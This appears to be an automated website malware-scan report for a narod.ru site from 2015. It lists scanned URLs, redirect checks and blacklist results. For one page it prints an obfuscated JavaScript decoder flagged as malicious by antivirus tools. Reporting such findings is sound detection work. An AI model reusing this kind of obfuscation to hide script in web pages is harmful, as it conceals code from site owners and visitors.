Scanned pages/files
Request | Server response | Status |
http://tursiops-truncatus.narod.ru/ | 200 OK Content-Length: 16627 Content-Type: text/html | clean |
http://tursiops-truncatus.narod.ru/abnl/?adsdata=xUZVlcVKv5TQEgPZFiLWuuF;5T5C6cmcaRGEZaMsbAav2lVgNwBKY8sdRk1Kmxf4aRBr9zAQWLVOdGfPtLIEOEhCxbMwz4eqCJ9JLx4r4vcm0d5ah!xcOx5zX81w2acilLG2fXHXX5Z0WpTUy5LxBA0uJD^NxzDTU;5O!ehYO3srNgoo | 200 OK Content-Length: 2797 Content-Type: application/javascript | clean |
http://tursiops-truncatus.narod.ru/simpl.html | 200 OK Content-Length: 12783 Content-Type: text/html | clean |
http://tursiops-truncatus.narod.ru/abnl/?adsdata=M36dndnFsxknKw9Pi!^7Q41tZW4cv!5fMp6zLs1bybqgeFzAC0mJBsY4itJHAMVl!2DuwnHT^XOAfHSxzt;ke11IbC1KjkDxh21KNhhn8Ni!GITq7QcVMuBHJjSaf^Gdaj7QjwUiSbyMWKxMstT5WR4G5R!XVrf1wjbcCbqRQicy | 200 OK Content-Length: 2817 Content-Type: application/javascript | clean |
http://tursiops-truncatus.narod.ru/simple.html | 200 OK Content-Length: 19110 Content-Type: text/html | clean |
http://tursiops-truncatus.narod.ru/abnl/?adsdata=kTjnrdaqzN6SDexKTEIA^gj84xLFfrlBQy2stStHniYb5ed3CR0WM1pc6HFn9qQ^ZCkyuTPNRsB9JxyOJewCvidzCUMxWM6MeQ16ylyMAq2QLsVRAKu4PYZIfMpnnkQ2!Bk6IbPqH7r!ZizIwjqWYL5v0S2sz!2g5YV3E0AOa3co | 200 OK Content-Length: 2785 Content-Type: application/javascript | clean |
http://tursiops-truncatus.narod.ru/gb | 200 OK Content-Length: 54320 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
    var _y8M='';
    function _dS(s){
        var i;var r="";
        var l=s.length-1;
        var k=s.substr(l,1);
        for (i=0;i<l;i++){
            c=s.charCodeAt(i)-k;
            if(c<32){ c=127-(32-c);}
            r+=String.fromCharCode(c);
        }
        return r;}
    _y8M=_dS('?lqsxw#w|sh@%klgghq%#qdph@%vrv%#ydoxh@%73647833<5%#2A3');
Antivirus reports:
http://tursiops-truncatus.narod.ru/abnl/?adsdata=P25cx7D1^ZtITttVunYGBxlA^UyM!cXXgpilwJtGNUnEqDeGdEudu;pK2fJ943!Fh5dvGyYOBe3cP7947UTwamFBxzFxzRZEjHzTazFkdnQiQcBbLzp5SjUJjrQLbBLh3b2NesuYQay1Rch6Zsc2fdFTI6VP6tQjdrgCb;^Shgoo | 200 OK Content-Length: 2817 Content-Type: application/javascript | clean |
http://s203.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s203.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s203.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://tursiops-truncatus.narod.ru/register | 200 OK Content-Length: 24474 Content-Type: text/html | clean |
http://tursiops-truncatus.narod.ru/abnl/?adsdata=irZk!d46y2NMPBpM2iMVP2MjqpaaKdGF;XSRGYW;YJG7eUsNf6JTctUgZEYskA8ZlfL28HbsQ^YAZFHUa7xUKczhtLMII0rJ;cXG4Juf6HrTMEmlnsTjeMnZLplJl!LNjaAnqCHQn9^yTFLuISWkLkM!O4Q^ZmNd5uHSw1OR73lR | 200 OK Content-Length: 2805 Content-Type: application/javascript | clean |
http://tursiops-truncatus.narod.ru/index/0-2 | 200 OK Content-Length: 17028 Content-Type: text/html | clean |
http://tursiops-truncatus.narod.ru/abnl/?adsdata=38lAGku6vQT5jaTSrcgXtOYuYVwZGl1MXxKXtnvepRG6H^LVdjvpB4!yj^ABCigyh8VpMMAvDQZAmTB;dR8qE9HQ;81rU5aL7YtLHmbW0rmJpKPV1t^LAZpGDnfcdTtuRqjHVF8b6stH^TEgstkzdMhXINg15bQbQKyCnTAc | 200 OK Content-Length: 2817 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tursiops-truncatus.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 20:07:37 GMT
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Second query (visit from search engine):
GET / HTTP/1.1
Host: tursiops-truncatus.narod.ru
Referer: http://www.google.com/search?q=tursiops-truncatus.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tursiops-truncatus.narod.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tursiops-truncatus.narod.ru/
Result: tursiops-truncatus.narod.ru is not infected or malware details are not published yet.